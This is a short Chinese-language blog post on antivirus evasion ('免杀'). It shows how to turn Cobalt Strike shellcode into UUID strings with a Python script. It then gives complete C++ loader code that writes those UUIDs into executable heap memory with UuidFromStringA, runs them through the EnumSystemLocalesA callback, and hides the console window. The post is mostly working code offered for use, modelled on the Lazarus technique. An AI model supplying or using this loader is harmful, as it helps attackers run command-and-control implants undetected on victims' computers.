c1ay's blog

shellcode-uuid免杀

字数统计: 322阅读时长: 1 min
2021/01/27 Share

参考文章

RIFT: Analysing a Lazarus Shellcode Execution Method

生成uuid

使用cobaltstrike生成python shellcode
Attacks->Packages->Payload Generator
语言选择python(什么语言都可以),这里选择了生成x64的shellcode

mark

用python将shellcode转为uuid,因为uuid.UUID(bytes_le=u)当中u的长度需要为16字节,所以需要将shellcode进行分组,每组16字节,不足的用\x00补位

1
2
3
4
5
6
7
8
import uuid
shellcode="shellcode"
new_shellcode=shellcode+'\x00'*(16-len(shellcode)%16)
i=0
while i<len(new_shellcode):
u=new_shellcode[i:i+16]
print uuid.UUID(bytes_le=u)
i+=16

将文章代码当中弹计算器的uuid替换为上面生成的uuid,编译C++代码:

编译方式选择:

如果生成的是64位的shellcode,需要使用releases x64位的方式进行编译

如果生成的是32位的shellcode,需要使用releases x86位的方式进行编译

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
const char* uuids[] =
{
uuid
};
int main()
{
FreeConsole();
HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
void* ha = HeapAlloc(hc, 0, 0x100000);
DWORD_PTR hptr = (DWORD_PTR)ha;
int elems = sizeof(uuids) / sizeof(uuids[0]);
for (int i = 0; i < elems; i++) {
RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)hptr);
if (status != RPC_S_OK) {
printf("UuidFromStringA() != S_OK\n");
CloseHandle(ha);
return -1;
}
hptr += 16;
}
printf("[*] Hexdump: ");
for (int i = 0; i < elems * 16; i++) {
printf("%02X ", ((unsigned char*)ha)[i]);
}
EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0);
CloseHandle(ha);
return 0;
}

mark

效果:

mark

mark

mark

可以使用FreeConsole()函数隐藏控制台

CATALOG
  1. 1. 参考文章
  2. 2. 生成uuid